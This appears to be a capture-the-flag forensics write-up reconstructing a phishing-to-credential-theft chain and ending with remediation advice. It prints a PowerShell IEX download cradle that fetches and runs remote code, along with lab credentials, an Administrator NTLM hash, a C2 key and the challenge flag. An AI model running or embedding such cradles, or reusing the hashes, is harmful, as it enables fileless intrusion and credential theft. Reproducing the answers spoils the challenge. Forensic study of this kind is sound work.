Case file

DFIR: phish mailbox, PowerShell download cradle, AES C2, Admin NTLM

Advanced DFIR engagement: reconstructed attacker path from compromised email credentials through an IEX download cradle, recovered the initial AES C2 key, and documented the Administrator NTLM hash taken from the host.

Advanced28 minDFIR · PowerShell · C2 · Credential Theft
01

Engagement summary

Mailbox tom.dom@eventhorizon.thm:password received a lure instructing AdministratOr execution; IEX pulled radius.ps1; AES key decrypted C2; Admin NTLM harvested.

EVENT HORIZON was a post-compromise forensics engagement reconstructing how an attacker crossed the client estate. Authentication artifacts showed the pair tom.dom@eventhorizon.thm:password granted access to the corporate mail service. The attacker-sent body impersonated Dom, urging Tom to run a script as AdministratOr and celebrating a fabricated “black hole mass” discovery. Host telemetry recovered the download cradle IEX(New-Object Net.WebClient).downloadString('http://10.0.2.45/radius.ps1') — classic fileless PowerShell stage-1. Memory/config analysis yielded the initial AES key used to decrypt C2 traffic (l86TfRDvvJMtXWxr1PSoh1QlXHnZnLwn+wz+aYy3/s8=). Lateral credential theft produced Administrator NTLM 13b1e64400203ecf38b1fdea2b11a09f. Engagement closure artifact: FLAG{ABOVE_AND_B3YOND_THE_EVENT_HORIZON}.

Business impact

Password-only mailbox access plus social engineering to run as Administrator collapses the trust boundary. Fileless IEX cradles evade naive AV; encrypted C2 blinds content inspection. Stolen Admin NTLM enables Pass-the-Hash across the domain. Mandatory MFA on mail, constrained language mode / AppLocker for PowerShell, and credential guard materially raise the cost of this chain.

02

Mailbox compromise and download cradle

Documented credential pair, lure body, and PowerShell IEX staging URL.

ANALYST · MAIL / HOST

savvy@lab:~$ cat evidence/mailbox_auth.txt

tom.dom@eventhorizon.thm:password

savvy@lab:~$ cat evidence/attacker_email_body.txt

Tom! I have done it! ... Run this script as the AdministratOr! Your BEst friend DOm

savvy@lab:~$ grep -oE "IEX\([^)]+\)" evidence/powershell_history.txt

IEX(New-Object Net.WebClient).downloadString('http://10.0.2.45/radius.ps1')

STAGE-1 CRADLE

cradle.ps1

IEX(New-Object Net.WebClient).downloadString('http://10.0.2.45/radius.ps1')
03

AES C2 key and Administrator NTLM

Recovered initial AES session key material and Admin NTLM from memory/artifacts.

ANALYST · C2 / CREDS

savvy@lab:~$ cat evidence/c2_aes_key.b64

l86TfRDvvJMtXWxr1PSoh1QlXHnZnLwn+wz+aYy3/s8=

savvy@lab:~$ cat evidence/admin_ntlm.txt

13b1e64400203ecf38b1fdea2b11a09f

savvy@lab:~$ cat evidence/engagement_flag.txt

FLAG{ABOVE_AND_B3YOND_THE_EVENT_HORIZON}

Remediation

Enforce MFA on email and privileged workstations. Enable Script Block Logging and constrain PowerShell. Detect Net.WebClient downloadString / IEX patterns. Isolate Admin credentials (PAWs, LAPS, no interactive Admin on mail-linked endpoints). Rotate NTLM secrets and purge golden tickets after confirmed theft.